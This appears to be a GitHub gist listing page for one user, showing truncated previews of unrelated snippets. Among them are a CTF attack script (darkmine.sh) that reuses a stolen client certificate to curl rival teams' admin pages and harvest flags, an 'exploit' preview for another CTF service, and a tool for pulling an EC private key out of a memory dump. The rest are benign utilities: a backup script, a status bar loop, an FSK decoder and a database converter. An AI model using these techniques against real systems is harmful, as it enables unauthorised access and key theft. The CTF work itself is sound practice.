
Andrew Grigorev ei-grad

ei-grad / darkmine.sh
Created May 25, 2013 05:09
Darkmine used SSL client-certificate authentication for access control on the /admin/ page, which was used by the jury checker. Teams were not able to generate a valid client certificate, but they could use the certificate from their own Apache.
#!/bin/bash
#scp root@vuln:/etc/ssl/private/* .
C="curl -sk -m 10 --key apache.key --cert apache.crt --cacert ca.crt"
while true; do
for team in 1 2 3 4 5 6 7 9 10
do
for salt in `$C https://172.17.$team.3:88/admin | egrep -o 'YOURFLAG\..{64}' | sed 's/YOURFLAG.//g' | sort -u`
ei-grad / ironmine.py
Created May 25, 2013 05:23
Ironmine exploit
#!/usr/bin/env python
import sys
import logging
from time import sleep
from collections import defaultdict
import socket
from urllib import urlencode
import re
from threading import Thread, Lock
from datetime import datetime, date
import calendar
def monthdelta(dt0, months=1):
year = dt0.year + (dt0.month + months) // 12
month = 1 + (dt0.month + months - 1) % 12
maxday = calendar.monthrange(year, month)[1]
if maxday < dt0.day:
d = date(year, month, maxday)
else:
def dictdiff(f):
def wrapper(a, b, *args, **kwargs):
try:
f(a, b, *args, **kwargs)
except AssertionError as e:
if isinstance(a, dict) and isinstance(b, dict):
a_items = a.items()
b_items = b.items()
in_a = [i for i in a_items if i not in b_items]
in_b = [i for i in b_items if i not in a_items]
ei-grad / findkey.c
Last active December 29, 2015 03:29
Find EC private key in the memory dump
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <openssl/ssl.h>
#include <openssl/ec.h>
const char usage[] = "using: %s <memdump.raw> <cert.pem>\n";
int main(int argc, char * argv[]) {
ei-grad / trinkup
Last active August 5, 2018 23:26
TRivial INcremental bacKUP script (MOVED TO REPOSITORY)
#!/bin/bash
#
# trinkup - TRivial INcremental bacKUP script
#
# Уж 200 раз твердили Сене:
# Хардлинк спасет от удаленья!
# А кто создать его поможет?
# Crontab и man, тупая рожа!
#
# (c) linux.org.ru, no-dashi
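# Status loop: about once per second, publish "<cpu>% <date>" as the X root
# window name via xsetroot. The loop runs in the background ("done &").
#
# CPU usage comes from the first line of /proc/stat: fields 2-4 are counted
# as busy time and field 5 as idle time. The percentage is the busy share of
# the difference between two consecutive samples (P = previous, C = current).
read -r -a P < <(awk 'NR==1 { printf("%d %d %d %d\n", $2, $3, $4, $5) }' /proc/stat)
while true; do
  DT="$(date +%c)"
  read -r -a C < <(awk 'NR==1 { printf("%d %d %d %d\n", $2, $3, $4, $5) }' /proc/stat)

  busy=$(( (C[0] - P[0]) + (C[1] - P[1]) + (C[2] - P[2]) ))
  total=$(( busy + (C[3] - P[3]) ))
  # Two samples with identical counters give total == 0; dividing by it is
  # an arithmetic error in bash, so report 0% for that interval instead.
  if (( total > 0 )); then
    CPU="$(( 100 * busy / total ))%"
  else
    CPU="0%"
  fi
  P=("${C[@]}")

  xsetroot -name "$CPU $DT"

  # Sleep until the next wall-clock second. %N is the nanosecond part of the
  # current time; the 10# prefix forces base 10 so that leading zeros are not
  # read as octal (and an all-zero value stays a valid number).
  ns="$(date '+%N')"
  remaining=$(( 1000000000 - 10#$ns ))
  if (( remaining >= 1000000000 )); then
    sleep 1
  else
    # Zero-pad to nine digits: without padding, 50000000 ns would be passed
    # to sleep as "0.50000000" (0.5 s) instead of "0.050000000" (0.05 s).
    sleep "$(printf '0.%09d' "$remaining")"
  fi
done &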
# FSK-decode
# For Python 3
# By Zoe Blade
# (Hopefully) converts a .wav file into a demodulated .bin file
import struct # For converting the (two's complement?) binary data to integers
import sys # For command line arguments
import wave # For .wav input and output
ei-grad / px2csv.c
Created June 14, 2014 18:31
Convert Paradox DB table to CSV
// sudo apt-get install pxlib
// gcc -std=c99 -lpx px2csv.c -o px2csv
#include <paradox.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
FILE *out;
int ret;
ei-grad / local.py
Last active August 29, 2015 14:02
def my_local(init):
key = object()
def getter():
t = _app_ctx_stack.top
l = getattr(t, 'my_locals')
if l is None:
t.my_locals = l = {}
if key not in l:
l[key] = init()
return l[key]